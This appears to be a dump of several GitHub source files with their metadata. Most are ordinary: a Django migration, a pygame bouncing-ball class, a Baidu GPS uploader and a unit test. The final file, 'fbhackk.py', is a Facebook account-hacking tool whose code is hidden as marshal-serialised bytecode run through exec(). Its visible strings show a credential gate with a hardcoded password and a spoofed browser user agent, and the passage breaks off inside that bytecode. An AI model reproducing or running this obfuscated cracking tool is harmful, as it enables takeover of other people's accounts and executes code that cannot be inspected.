UTF-8
|
Python
| false
| false
| 484
|
py
|
# Generated by Django 3.1.2 on 2021-04-18 18:44
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('CORE', '0018_auto_20210418_1354'),
]
operations = [
migrations.AddField(
model_name='empleado',
name='nombreUsuario',
field=models.CharField(default=0, max_length=30, unique=True, verbose_name='Nombre de usuario'),
preserve_default=False,
),
]
|
[
"williams.parra.parra@gmail.com"
] |
williams.parra.parra@gmail.com
|
9579a5ea7fad7a79327c9acb00f549bdbc62ea29
|
6b9ee9e92d0c0075b7098f43c7b0cd3cd49b4f63
|
/ball.py
|
ab81587f8faf0ae9f6f2ccec3ddecc81faaef82e
|
[] |
no_license
|
dohyunmoo/Bouncing-Balls
|
429c5f9c6adf3afbb958ce858f962f221c8c9f35
|
5dc081a7a6b54bf18d360a984f9c30f9141d2829
|
refs/heads/main
| 2023-02-17T21:52:48.607727
| 2021-01-08T13:18:42
| 2021-01-08T13:18:42
| 327,908,171
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,177
|
py
|
import pygame
import random
pygame.init()
class Ball:
def __init__(self, radius, color, startingx, startingy, friction, weight):
self.radius = radius
self.diameter = radius*2
self.color = color
self.x = startingx
self.y = startingy
self.vx = friction
self.vy = weight
self.yspeed = 0
self.xspeed = 0
def draw(self, win, width, height):
minimumx = self.radius
maximumx = width - self.radius
minimumy = self.radius
maximumy = height - self.radius
if self.xspeed >= 0 and self.xspeed != 0:
self.xspeed -= self.vx
elif self.xspeed < 0 and self.xspeed != 0:
self.xspeed += self.vx
self.x += self.xspeed
self.yspeed += self.vy
self.y += self.yspeed
self.collision(width, height, minimumx, maximumx, minimumy, maximumy)
if self.x >= maximumx:
self.x = maximumx
if self.y >= maximumy:
self.y = maximumy
pygame.draw.circle(win, self.color, (self.x, self.y), self.radius)
def collision(self, width, height, xmin, xmax, ymin, ymax):
if self.x <= xmin or self.x >= xmax:
self.xspeed *= -1
if self.xspeed >= 0 and self.xspeed != 0:
self.xspeed -= self.vx
elif self.xspeed < 0 and self.xspeed != 0:
self.xspeed += self.vx
self.x += self.xspeed
elif self.y >= ymax:
self.yspeed *= -1
self.yspeed += self.vy
self.y += self.yspeed
def addForce(self, pos):
if (pos[0] <= self.x + self.radius and pos[0] >= self.x - self.radius) and (pos[1] <= self.y + self.radius and pos[1] >= self.y - self.radius):
if self.xspeed <= 0:
self.xspeed -= random.randint(5,10)
else:
self.xspeed += random.randint(5,10)
if self.yspeed <= 0:
self.yspeed -= random.randint(10,20)
else:
self.yspeed += random.randint(10,20)
|
[
"noreply@github.com"
] |
dohyunmoo.noreply@github.com
|
1eba989f3c48ca9bd2b7d760fa77a54a3143f1b6
|
39262b161d4d8eb290ed1a013a23a33d45be533b
|
/package/gpsuploader.py
|
eb18c63592ba52d8d5c8d45104bd90f6d19e865d
|
[] |
no_license
|
watermelonharry/socket_func_pyqt
|
be9394105f5cf7c442479c04b0ac18c2a05c3605
|
bedbc5d3946a49eced472fcdea8cc70d727ec0ab
|
refs/heads/master
| 2021-01-16T21:29:17.226298
| 2017-07-27T12:24:22
| 2017-07-27T12:24:22
| 59,997,128
| 1
| 0
| null | 2016-06-04T02:44:53
| 2016-05-30T09:19:47
|
Python
|
UTF-8
|
Python
| false
| false
| 5,459
|
py
|
# -*- coding:UTF-8 -*-
import time
from PyQt4.QtCore import QThread, QMutex, QMutexLocker
import threading
import requests, os
"""
基于百度鹰眼api:http://lbsyun.baidu.com/index.php?title=yingyan/api/track
"""
##config file path
CONFIG_PATH = '/'.join(os.getcwd().split('\\')) + '/websrc/gps_config.dat'
CONFIG_URL = 'http://api.map.baidu.com/trace/v2/track/addpoint'
def time_to_unix(time_str):
"""
unix时间戳计算
:param time_str: str 'year month day hour minute sec' in decimal
:return: int(UNIX_TIMESTAMP)
"""
try:
s = time.mktime(time.strptime(time_str, '%Y %m %d %H %M %S'))
return int(s)
except Exception as e:
return None
##INPUT: str or int(unix timestamp)
##output: str 'year month day hour minute sec' in decimal
def unix_to_time(unix_str):
try:
dt = time.localtime(int(unix_str))
return str(' '.join([str(i) for i in dt][:6]))
except Exception as e:
return None
def current_unix():
try:
unix_str = int(time.mktime(time.localtime()))
return unix_str
except Exception as e:
return None
#class GpsUploader(threading.Thread):
class GpsUploader(QThread):
GPSMutex = QMutex()
def __init__(self, updateMainSignal = None, recSignal = None, toPickPointSignal = None):
super(GpsUploader, self).__init__()
self.para = {
'ak':None,
'service_id':None,
'latitude':None, #wei du,double,-90.0~90.0
'longitude':None, #jing du,double, -180-180.0
'coord_type':1,
'loc_time':None, #UNIX time stamp
'entity_name':None}
self.get_ak()
self.points = []
self.updateMainSignal = updateMainSignal
self.recSignal = recSignal
self.toPickPointSignal = toPickPointSignal
#point_tuple: (longitude, latitude, unix_time)
#the element type can be str/int/double
def add_point(self, point_tuple):
#get lock
with QMutexLocker(self.GPSMutex):
self.points.append(point_tuple)
#release the lock
def run(self):
# print(self.hello)
# print (self.para)
#get lock
with QMutexLocker(self.GPSMutex):
up_count = 0
del_count = 0
fail_count = 0
# fail_list = []
if len(self.points) != 0:
for point in self.points:
if self.set_point(long= point[0], lat=point[1]):
if self.upload_one_point():
up_count += 1
else:
fail_count += 1
# fail_list.append(point)
else:
del_count +=1
self.points = []
self.update_main(
'enter-func-GpsUploader-run: ' + str(up_count) + ' uploaded, ' + str(fail_count) + ' failed, ' + str(
del_count) + ' deleted.')
#release lock
# self.points = fail_list
#update to mainwindow
def update_main(self, str_arg):
self.updateMainSignal.emit(str_arg)
print(str_arg)
def get_ak(self):
try:
with open(CONFIG_PATH, 'r') as data:
for line in data:
temp = line.split(':')
self.para[temp[0]] = temp[1][:-1]
self.para['loc_time'] = current_unix()
print(self.para)
except Exception as e:
print('error-uploader init failed:', e.message)
def set_point(self,long = None, lat = None, time = current_unix(), coord_type = 1):
if long is None or lat is None:
return False
else:
self.para['longitude'] = long
self.para['latitude'] = lat
self.para['loc_time'] = time
self.para['coord_type'] = coord_type
return True
def upload_one_point(self):
reply = requests.post(CONFIG_URL, data = self.para).json()
if reply['status'] is 0:
return True
else:
return False
# def GtoB(self, G_lon, G_lat):
# """
# GPS坐标转换为百度坐标
# :param G_lon: GPS经度
# :param G_lat: GPS纬度
# :return: (百度经度,百度纬度) 或 None
# """
# try:
# import json
# import base64
# url = 'http://api.map.baidu.com/ag/coord/convert?from=0&to=4&x=%s&y=%s' % (str(G_lon), str(G_lat))
# source_code = requests.get(url)
# plain_text = source_code.text
# c = json.loads(plain_text)
# if c['error'] == 0:
# return (base64.decodestring(c['x']), base64.decodestring(c['y'])) # lat,lon in string type
# else:
# return None
# except Exception as e:
# print('error in GtoB:', e.message)
# return None
if __name__ == '__main__':
test_p = [
('120.13143165691','30.272977524721' ),
('120.13143165690','30.272977524720' ),
('120.13143165689','30.272977524719' ),
('120.13143165688','30.272977524718' ),
('120.13143165687','30.272977524717' ),
]
c = GpsUploader()
for p in test_p:
c.add_point(p)
c.start()
|
[
"bongbongca@foxmail.com"
] |
bongbongca@foxmail.com
|
f352ec7987f6f9addb4cc8a333cc19463e602697
|
5332fef91e044555e605bb37cbef7c4afeaaadb0
|
/hy-data-analysis-with-python-2020/part02-e06_file_count/test/test_file_count.py
|
c7d3f00f44cd8f760c403784983ad6ec08d26a70
|
[] |
no_license
|
nopomi/hy-data-analysis-python-2019
|
f3baa96bbe9b6ee7f0b3e6f6b8b0f3adfc3b6cc8
|
464685cb377cfdeee890a008fbfbd9ed6e3bcfd0
|
refs/heads/master
| 2021-07-10T16:16:56.592448
| 2020-08-16T18:27:38
| 2020-08-16T18:27:38
| 185,044,621
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,560
|
py
|
#!/usr/bin/env python3
import sys
import unittest
from unittest.mock import patch
from itertools import repeat
from tmc import points
from tmc.utils import load, get_out
module_name="src.file_count"
file_count = load(module_name, "file_count")
main = load(module_name, "main")
class FileCount(unittest.TestCase):
@points('p02-06.1')
def test_first(self):
l, w, c = file_count("src/test.txt")
self.assertEqual(l, 8, msg="Wrong number of lines for file 'test.txt'!")
self.assertEqual(w, 105, msg="Wrong number of words for file 'test.txt'!")
self.assertEqual(c, 647, msg="Wrong number of characters for file 'test.txt'!")
@points('p02-06.1')
def test_calls(self):
with patch('builtins.open', side_effect=open) as o:
file_count("src/test.txt")
o.assert_called_once()
@points('p02-06.2')
def test_main(self):
orig_argv = sys.argv
n = 7
sys.argv[1:] = ["file%i" % i for i in range(n)]
with patch('src.file_count.file_count', side_effect=repeat((0,0,0))) as fc:
main()
self.assertEqual(fc.call_count, n,
msg="Wrong number of calls to function 'file_count' for %i command line parameters!" % n)
result = get_out().split('\n')
for i, line in enumerate(result):
self.assertEqual(line.strip(), "0\t0\t0\tfile%i" % i,
msg="Wrong result on line %i!" % i)
sys.argv = orig_argv
if __name__ == '__main__':
unittest.main()
|
[
"miska.noponen@gmail.com"
] |
miska.noponen@gmail.com
|
4ae5f578d4843f3c010396030d69aa334d3cb6e3
|
3fdda7a9a8efb5c41302fe39cf8cd74c09aa2326
|
/fbhackk.py
|
dba2d05a9f3a2997c14a7edaf34c360ab584cebd
|
[] |
no_license
|
RandiSr/dark-fb
|
330809c38fe713c2d70e1571a17f400ba7e5edf5
|
0088d24c5b344fc71d8327dcf70ef1717cf224c4
|
refs/heads/master
| 2020-07-22T02:51:11.719676
| 2019-09-08T03:09:14
| 2019-09-08T03:09:14
| 207,052,986
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 204,567
|
py
|
#Coder By: RandiSr
#mau Recode silahkan;v
#Team: Muslim Cyber Army
#Github: https://github.com/RandiSr
#Channel Youtube: RANDIOLOYY
import marshal
exec(marshal.loads('''c\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00@\x00\x00\x00sI\x04\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x01\x00l\x02\x00Z\x02\x00d\x00\x00d\x01\x00l\x03\x00Z\x03\x00d\x00\x00d\x01\x00l\x04\x00Z\x04\x00d\x00\x00d\x01\x00l\x05\x00Z\x05\x00d\x00\x00d\x01\x00l\x06\x00Z\x06\x00d\x00\x00d\x01\x00l\x07\x00Z\x07\x00d\x00\x00d\x01\x00l\x08\x00Z\x08\x00d\x00\x00d\x01\x00l\t\x00Z\t\x00d\x00\x00d\x01\x00l\n\x00Z\n\x00d\x00\x00d\x01\x00l\x0b\x00Z\x0b\x00d\x00\x00d\x02\x00l\x0c\x00m\r\x00Z\r\x00\x01y\x10\x00d\x00\x00d\x01\x00l\x0e\x00Z\x0e\x00Wn\x1e\x00\x04e\x0f\x00k\n\x00r\xd0\x00\x01\x01\x01e\x00\x00j\x10\x00d\x03\x00\x83\x01\x00\x01n\x01\x00Xy\x10\x00d\x00\x00d\x01\x00l\x11\x00Z\x11\x00Wn\x1e\x00\x04e\x0f\x00k\n\x00r\x01\x01\x01\x01\x01e\x00\x00j\x10\x00d\x04\x00\x83\x01\x00\x01n\x01\x00Xd\x00\x00d\x05\x00l\x12\x00m\x13\x00Z\x13\x00\x01d\x00\x00d\x06\x00l\x0e\x00m\x14\x00Z\x14\x00\x01e\x15\x00e\x01\x00\x83\x01\x00\x01e\x01\x00j\x16\x00d\x07\x00\x83\x01\x00\x01e\x0e\x00j\x14\x00\x83\x00\x00Z\x17\x00e\x17\x00j\x18\x00e\x19\x00\x83\x01\x00\x01e\x17\x00j\x1a\x00e\x0e\x00j\x1b\x00j\x1c\x00\x83\x00\x00d\x08\x00d\t\x00\x83\x01\x01\x01dO\x00g\x01\x00e\x17\x00_\x1d\x00d\x0c\x00\x84\x00\x00Z\x1e\x00d\r\x00\x84\x00\x00Z\x1f\x00d\x0e\x00\x84\x00\x00Z \x00d\x0f\x00\x84\x00\x00Z!\x00d\x10\x00Z"\x00d\x11\x00\x84\x00\x00Z#\x00d\x12\x00a$\x00g\x00\x00Z%\x00g\x00\x00a&\x00g\x00\x00a\'\x00g\x00\x00a(\x00g\x00\x00a)\x00g\x00\x00Z*\x00g\x00\x00Z+\x00g\x00\x00Z,\x00g\x00\x00Z-\x00g\x00\x00Z.\x00g\x00\x00Z/\x00g\x00\x00Z0\x00g\x00\x00Z1\x00g\x00\x00Z2\x00g\x00\x00Z3\x00g\x00\x00Z4\x00g\x00\x00Z5\x00g\x00\x00Z6\x00g\x00\x00Z7\x00g\x00\x00Z8\x00d\x13\x00Z9\x00d\x14\x00Z:\x00d\x15\x00Z;\x00d\x16\x00Z<\x00d\x17\x00\x84\x00\x00Z=\x00d\x18\x00\x84\x00\x00Z>\x00d\x19\x00\x84\x00\x00Z?\x00d\x1a\x00\x84\x00\x00Z@\x00d\x1b\x00\x84\x00\x00ZA\x00d\x1c\x00\x84\x00\x00ZB\x00d\x1d\x00\x84\x00\x00ZC\x00d\x1e\x00\x84\x00\x00ZD\x00d\x1f\x00\x84\x00\x00ZE\x00d \x00\x84\x00\x00ZF\x00d!\x00\x84\x00\x00ZG\x00d"\x00\x84\x00\x00ZH\x00d#\x00\x84\x00\x00ZI\x00d$\x00\x84\x00\x00ZJ\x00d%\x00\x84\x00\x00ZK\x00d&\x00\x84\x00\x00ZL\x00d\'\x00\x84\x00\x00ZM\x00d(\x00\x84\x00\x00ZN\x00d)\x00\x84\x00\x00ZO\x00d*\x00\x84\x00\x00ZP\x00d+\x00\x84\x00\x00ZQ\x00d,\x00\x84\x00\x00ZR\x00d-\x00\x84\x00\x00ZS\x00d.\x00\x84\x00\x00ZT\x00d/\x00\x84\x00\x00ZU\x00d0\x00\x84\x00\x00ZV\x00d1\x00\x84\x00\x00ZW\x00d2\x00\x84\x00\x00ZX\x00d3\x00\x84\x00\x00ZY\x00d4\x00\x84\x00\x00ZZ\x00d5\x00\x84\x00\x00Z[\x00d6\x00\x84\x00\x00Z\\\x00d7\x00\x84\x00\x00Z]\x00d8\x00\x84\x00\x00Z^\x00d9\x00\x84\x00\x00Z_\x00d:\x00\x84\x00\x00Z`\x00d;\x00\x84\x00\x00Za\x00d<\x00\x84\x00\x00Zb\x00d=\x00\x84\x00\x00Zc\x00d>\x00\x84\x00\x00Zd\x00d?\x00\x84\x00\x00Ze\x00d@\x00\x84\x00\x00Zf\x00dA\x00\x84\x00\x00Zg\x00dB\x00\x84\x00\x00Zh\x00dC\x00\x84\x00\x00Zi\x00dD\x00\x84\x00\x00Zj\x00dE\x00\x84\x00\x00Zk\x00dF\x00\x84\x00\x00Zl\x00dG\x00\x84\x00\x00Zm\x00dH\x00\x84\x00\x00Zn\x00dI\x00\x84\x00\x00Zo\x00dJ\x00\x84\x00\x00Zp\x00dK\x00\x84\x00\x00Zq\x00dL\x00\x84\x00\x00Zr\x00dM\x00\x84\x00\x00Zs\x00et\x00dN\x00\x84\x01\x00Zu\x00e=\x00\x83\x00\x00\x01d\x01\x00S(P\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\n\x00\x00\x00ThreadPools\x16\x00\x00\x00pip2 install mechanizes\x15\x00\x00\x00pip2 install requests(\x01\x00\x00\x00t\x0f\x00\x00\x00ConnectionError(\x01\x00\x00\x00t\x07\x00\x00\x00Browsert\x04\x00\x00\x00utf8t\x08\x00\x00\x00max_timei\x01\x00\x00\x00s\n\x00\x00\x00User-AgentsR\x00\x00\x00Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00C\x00\x00\x00s\x16\x00\x00\x00d\x01\x00GHt\x00\x00j\x01\x00j\x02\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\x0f\x00\x00\x00\x1b[1;91m[!] Exit(\x03\x00\x00\x00t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\x06\x00\x00\x00keluar\x1f\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x05\x01c\x01\x00\x00\x00\x04\x00\x00\x00\x08\x00\x00\x00C\x00\x00\x00sS\x00\x00\x00d\x01\x00}\x01\x00d\x02\x00}\x02\x00x:\x00|\x00\x00D]2\x00}\x03\x00|\x02\x00d\x03\x00|\x01\x00t\x00\x00j\x01\x00d\x04\x00t\x02\x00|\x01\x00\x83\x01\x00d\x05\x00\x18\x83\x02\x00\x19\x17|\x03\x00\x177}\x02\x00q\x13\x00Wt\x03\x00|\x02\x00\x83\x01\x00S(\x06\x00\x00\x00Nt\x07\x00\x00\x00mhkbpcPt\x00\x00\x00\x00t\x01\x00\x00\x00!i\x00\x00\x00\x00i\x01\x00\x00\x00(\x04\x00\x00\x00t\x06\x00\x00\x00randomt\x07\x00\x00\x00randintt\x03\x00\x00\x00lent\x05\x00\x00\x00cetak(\x04\x00\x00\x00t\x01\x00\x00\x00xt\x01\x00\x00\x00wt\x01\x00\x00\x00dt\x01\x00\x00\x00i(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\x04\x00\x00\x00acak$\x00\x00\x00s\n\x00\x00\x00\x00\x01\x06\x01\x06\x01\r\x010\x01c\x01\x00\x00\x00\x04\x00\x00\x00\x07\x00\x00\x00C\x00\x00\x00s~\x00\x00\x00d\x01\x00}\x01\x00xA\x00|\x01\x00D]9\x00}\x02\x00|\x01\x00j\x00\x00|\x02\x00\x83\x01\x00}\x03\x00|\x00\x00j\x01\x00d\x02\x00|\x02\x00\x16d\x03\x00t\x02\x00d\x04\x00|\x03\x00\x17\x83\x01\x00\x16\x83\x02\x00}\x00\x00q\r\x00W|\x00\x00d\x05\x007}\x00\x00|\x00\x00j\x01\x00d\x06\x00d\x05\x00\x83\x02\x00}\x00\x00t\x03\x00j\x04\x00j\x05\x00|\x00\x00d\x07\x00\x17\x83\x01\x00\x01d\x00\x00S(\x08\x00\x00\x00NR\t\x00\x00\x00s\x03\x00\x00\x00!%ss\x07\x00\x00\x00\x1b[%s;1mi\x1f\x00\x00\x00s\x04\x00\x00\x00\x1b[0ms\x02\x00\x00\x00!0s\x01\x00\x00\x00\n(\x06\x00\x00\x00t\x05\x00\x00\x00indext\x07\x00\x00\x00replacet\x03\x00\x00\x00strR\x06\x00\x00\x00t\x06\x00\x00\x00stdoutt\x05\x00\x00\x00write(\x04\x00\x00\x00R\x10\x00\x00\x00R\x11\x00\x00\x00R\x13\x00\x00\x00t\x01\x00\x00\x00j(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x0f\x00\x00\x00+\x00\x00\x00s\x0e\x00\x00\x00\x00\x01\x06\x01\r\x01\x0f\x01(\x01\n\x01\x12\x01c\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sC\x00\x00\x00x<\x00|\x00\x00d\x01\x00\x17D]0\x00}\x01\x00t\x00\x00j\x01\x00j\x02\x00|\x01\x00\x83\x01\x00\x01t\x00\x00j\x01\x00j\x03\x00\x83\x00\x00\x01t\x04\x00j\x05\x00d\x02\x00\x83\x01\x00\x01q\x0b\x00Wd\x00\x00S(\x03\x00\x00\x00Ns\x01\x00\x00\x00\ng\x9a\x99\x99\x99\x99\x99\xb9?(\x06\x00\x00\x00R\x06\x00\x00\x00R\x18\x00\x00\x00R\x19\x00\x00\x00t\x05\x00\x00\x00flusht\x04\x00\x00\x00timet\x05\x00\x00\x00sleep(\x02\x00\x00\x00t\x01\x00\x00\x00zt\x01\x00\x00\x00e(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\x05\x00\x00\x00jalan5\x00\x00\x00s\x08\x00\x00\x00\x00\x01\x11\x01\x10\x01\r\x01s\xec\x03\x00\x00\n\x1b[1;96m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\n\x1b[1;96m\xe2\x96\x88\xe2\x96\x84\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84\xe2\x96\x88 \n\x1b[1;96m\xe2\x96\x88 \xe2\x96\xbc\xe2\x96\xbc\xe2\x96\xbc\xe2\x96\xbc\xe2\x96\xbc _-_-- \xe2\x97\x8f\xe2\x96\xac\xe2\x96\xac\xe2\x96\xac\xe2\x96\xac\xe2\x96\xac\xe2\x96\xac\xe2\x96\xac\xe2\x96\xac\xe2\x96\xac\xe0\xb9\x91\xdb\xa9\xdb\xa9\xe0\xb9\x91\xe2\x96\xac\xe2\x96\xac\xe2\x96\xac\xe2\x96\xac\xe2\x96\xac\xe2\x96\xac\xe2\x96\xac\xe2\x96\xac\xe2\x97\x8f\n\x1b[1;96m\xe2\x96\x88. _-_-- -_ -- RECODE : RandiSr\n\x1b[1;96m\xe2\x96\x88 \xe2\x96\xb2\xe2\x96\xb2\xe2\x96\xb2\xe2\x96\xb2\xe2\x96\xb2 -_ -\xc2\xab============\xe2\x9c\xa7==========\xc2\xbb\n\x1b[1;96m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88 SUBSCRIBE NOW TO MY CHANNELL ...!!\n\x1b[1;96m \xe2\x96\x88\xe2\x96\x88 \xe2\x96\x88\xe2\x96\x88 VIP-V1 by RandiSr \n\x1b[1;93m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x97\n\x1b[1;93m\xe2\x95\x91\x1b[1;96m\xc2\xa4 \x1b[1;93mAuthor \x1b[1;93m: \x1b[1;93mMr.NEWBIE3X \x1b[1;93m \xe2\x95\x91\n\x1b[1;93m\xe2\x95\x91\x1b[1;96m\xc2\xa4 \x1b[1;93mKontak \x1b[1;93m: \x1b[1;93m\x1b[4m081290587***\x1b[0m \x1b[1;93m \xe2\x95\x91\n\x1b[1;93m\xe2\x95\x91\x1b[1;96m\xc2\xa4 \x1b[1;93mEmail \x1b[1;93m : \x1b[1;93m\x1b[4mRandisahrulr@gmail.com\x1b[0m \x1b[1;93m \xe2\x95\x91\n\x1b[1;93m\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\nc\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sF\x00\x00\x00d\x01\x00d\x02\x00d\x03\x00g\x03\x00}\x00\x00x0\x00|\x00\x00D](\x00}\x01\x00d\x04\x00|\x01\x00\x17Gt\x00\x00j\x01\x00j\x02\x00\x83\x00\x00\x01t\x03\x00j\x04\x00d\x05\x00\x83\x01\x00\x01q\x16\x00Wd\x00\x00S(\x06\x00\x00\x00Ns\x04\x00\x00\x00. s\x04\x00\x00\x00.. s\x07\x00\x00\x00...... s,\x00\x00\x00\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mTunggu sebentar \x1b[1;97mi\x01\x00\x00\x00(\x05\x00\x00\x00R\x06\x00\x00\x00R\x18\x00\x00\x00R\x1b\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00(\x02\x00\x00\x00t\x05\x00\x00\x00titikt\x01\x00\x00\x00o(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\x03\x00\x00\x00tikL\x00\x00\x00s\n\x00\x00\x00\x00\x01\x0f\x01\r\x01\x08\x00\r\x00i\x00\x00\x00\x00s\r\x00\x00\x00\x1b[31mNot Vulns\t\x00\x00\x00\x1b[32mVulnt\t\x00\x00\x00randioloyt\x08\x00\x00\x0016122003c\x00\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\'\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y \x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00t\x04\x00\x83\x00\x00\x01Wn\xf3\x00\x04t\x05\x00t\x06\x00f\x02\x00k\n\x00r"\x01\x01\x01\x01t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x07\x00GHt\x08\x00j\t\x00d\x04\x00\x83\x01\x00\x01d\x05\x00GHt\x08\x00j\t\x00d\x06\x00\x83\x01\x00\x01t\x00\x00j\x01\x00d\x07\x00\x83\x01\x00\x01d\x08\x00GHt\x08\x00j\t\x00d\t\x00\x83\x01\x00\x01d\n\x00GHt\n\x00d\x0b\x00\x83\x01\x00}\x01\x00|\x01\x00t\x0b\x00k\x02\x00r\t\x01t\n\x00d\x0c\x00\x83\x01\x00}\x02\x00|\x02\x00t\x0c\x00k\x02\x00r\xe3\x00d\r\x00GHt\n\x00d\x0e\x00\x83\x01\x00}\x03\x00t\r\x00\x83\x00\x00\x01q\x1f\x01d\x0f\x00GHt\n\x00d\x10\x00\x83\x01\x00\x01t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x0e\x00\x83\x00\x00\x01q#\x01d\x11\x00GHt\n\x00d\x12\x00\x83\x01\x00\x01t\x0e\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(\x13\x00\x00\x00Nt\x05\x00\x00\x00resets\x07\x00\x00\x00mew.txtt\x01\x00\x00\x00ri\x01\x00\x00\x00s*\x00\x00\x00Biasanya yg gak subscribe tidak bisa logini\x03\x00\x00\x00sB\x00\x00\x00xdg-open https://www.youtube.com/channel/UCbZ45S0QGbo5IAaItt-mBlA s\x1d\x00\x00\x00User dan Password Kontak me;)i\x05\x00\x00\x00s\x1b\x00\x00\x00Masukan User dan Pass nya ?s,\x00\x00\x00\n\x1b[32;1m[\x1b[33;1m#\x1b[32;1m]\x1b[37;1m Username : s+\x00\x00\x00\x1b[32;1m[\x1b[33;1m#\x1b[32;1m]\x1b[37;1m Password : s.\x00\x00\x00\x1b[32;1m[\x1b[32;1m+\x1b[32;1m]\x1b[37;1m login Berhasils8\x00\x00\x00\x1b[32;1m[\x1b[31;1m+\x1b[32;1m]\x1b[37;1m Press Enter to continue sB\x00\x00\x00\x1b[32;1m[\x1b[31;1m-\x1b[32;1m]\x1b[37;1m Password \x1b[31;1mlicensi anda salahs5\x00\x00\x00\x1b[32;1m[\x1b[31;1m+\x1b[32;1m]\x1b[37;1m You Must Enter Again s5\x00\x00\x00\x1b[32;1m[\x1b[31;1m-\x1b[32;1m]\x1b[37;1m Username \x1b[31;1mSalahs6\x00\x00\x00\x1b[32;1m[\x1b[31;1m+\x1b[32;1m]\x1b[37;1m You Must Enter Again (\x0f\x00\x00\x00R\x05\x00\x00\x00t\x06\x00\x00\x00systemt\x04\x00\x00\x00opent\x04\x00\x00\x00readt\x04\x00\x00\x00menut\x08\x00\x00\x00KeyErrort\x07\x00\x00\x00IOErrort\x04\x00\x00\x00logoR\x1c\x00\x00\x00R\x1d\x00\x00\x00t\t\x00\x00\x00raw_inputt\x04\x00\x00\x00namet\x04\x00\x00\x00pawst\x05\x00\x00\x00logint\x02\x00\x00\x00an(\x04\x00\x00\x00t\x05\x00\x00\x00tokett\x05\x00\x00\x00unamet\x03\x00\x00\x00pwdt\x03\x00\x00\x00cek(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R3\x00\x00\x00k\x00\x00\x00s8\x00\x00\x00\x00\x01\r\x01\x03\x01\x15\x01\x0b\x01\x13\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\r\x01\x05\x01\r\x01\x05\x01\x0c\x01\x0c\x01\x0c\x01\x0c\x01\x05\x01\x0c\x01\n\x02\x05\x01\n\x01\r\x01\n\x02\x05\x01\n\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\x9f\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00GHd\x02\x00GHd\x03\x00GHd\x04\x00GHd\x05\x00GHt\x03\x00d\x06\x00\x83\x01\x00}\x00\x00|\x00\